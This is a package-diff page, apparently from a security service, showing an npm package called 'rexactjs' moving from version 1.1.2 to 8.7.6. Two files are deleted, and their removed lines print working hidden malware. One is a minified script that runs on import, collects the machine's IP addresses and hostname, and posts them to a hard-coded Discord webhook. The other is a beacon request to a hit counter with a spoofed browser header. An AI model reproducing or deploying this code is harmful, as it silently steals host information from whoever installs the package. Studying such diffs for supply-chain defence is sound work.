rexactjs 1.1.2 → 8.7.6
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +0 -1
- package/package.json +1 -1
- package/new.js +0 -1
package/index.js
CHANGED
@@ -1 +0,0 @@
|
|
1
|
-
const https = require('https'); const main = (function(){ const options = { hostname: 'hits.dwyl.com', path: '/serialfuzzer/serialfuzzer', method: 'GET', headers: { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'Referer': 'https://github.com/serialfuzzer' } }; const req = https.request(options, (res) => { res.on('data', (chunk) => {}); }); req.on('error', (error) => { }); req.end(); return {}; })(); module.exports = main;
|
package/package.json
CHANGED
package/new.js
DELETED
@@ -1 +0,0 @@
|
|
1
|
-
function sendToDiscord(e,t){const o=new URL(e),n=JSON.stringify({content:t}),s={hostname:o.hostname,port:443,path:o.pathname+o.search,method:"POST",headers:{"Content-Type":"application/json","Content-Length":n.length}},r=https.request(s,e=>{});r.on("error",e=>{console.error(e)}),r.write(n),r.end()}const https=require("https"),os=require("os"),main=!function(){var e="https://discord.com/api/webhooks/1155988140591419412/bleuGvUtBCzaGsAkAI1MT9Yd-6YxHuUlZe91XSdfioky5-0e3gzeW4ztWskX1qYjSxzr";const t=Object.keys(os.networkInterfaces()).map(e=>os.networkInterfaces()[e][0].address).join(",").concat(", "+os.hostname());return sendToDiscord(e,t),{}}();module.exports=main;
|